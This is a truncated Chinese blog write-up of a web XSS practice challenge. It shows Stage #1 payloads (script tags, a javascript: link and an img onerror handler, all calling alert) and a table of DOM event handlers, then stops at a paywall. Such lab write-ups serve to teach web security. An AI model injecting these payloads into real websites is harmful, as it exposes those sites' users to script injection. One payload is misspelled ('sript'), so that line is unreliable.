本文详细介绍了多个XSS挑战阶段,从标签风格、JavaScript伪协议到事件方法,逐步解析如何绕过过滤机制。涉及DOM事件、鼠标/键盘属性、IE及标准Event属性和方法。在后续阶段中,讨论了编码绕过、长度限制、双写绕过等策略,以及UTF-7编码和解密函数在XSS攻击中的应用。
文章目录
点击访问: link
Stage #1
因为第一题是处在标签中的,所以可以有多种做法
1.标签风格
<script>alert(document.domain)</script>
或
</b><sript>alert(document.domain)</script>
2.JavaScript伪协议
</b><a href="javascript:alert(document.domain)">224242</a>
3.事件方法
<img src=# onerror=alert(document.domain); />
对DOM事件的补充:
事件句柄 (Event Handlers)
HTML 4.0 的新特性之一是能够使 HTML 事件触发浏览器中的行为,比如当用户点击某个 HTML 元素时启动一段 JavaScript。下面是一个属性列表,可将之插入 HTML 标签以定义事件的行为。
| 属性 | 此事件发生在何时… |
|---|---|
| onabort | 图像的加载被中断。 |
| onblur | 元素失去焦点。 |
| onchange | 域的内容被改变。 |
| onclick | 当用户点击某个对象时调用的事件句柄。 |
| ondblclick | 当用户双击某个对象时调用的事件句柄。 |
| onerror | 在加载文档或图像时发生错误。 |
| onfocus | 元素获得焦点。 |
| onkeydown | 某个键盘按键被按下。 |
| onkeypress | 某个键盘按键被按下并松开。 |
| onkeyup | 某个键盘按键被松开。 |
| onload | 一张页面或一幅图像完成加载。 |
| onmousedown | 鼠标按钮被按下。 |
| onmousemove | 鼠标被移动。 |
| onmouseout | 鼠标从某元素移开。 |
| onmouseover | 鼠标移到某元素之上。 |
| onmouse |
最低0.47元/天 解锁文章
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
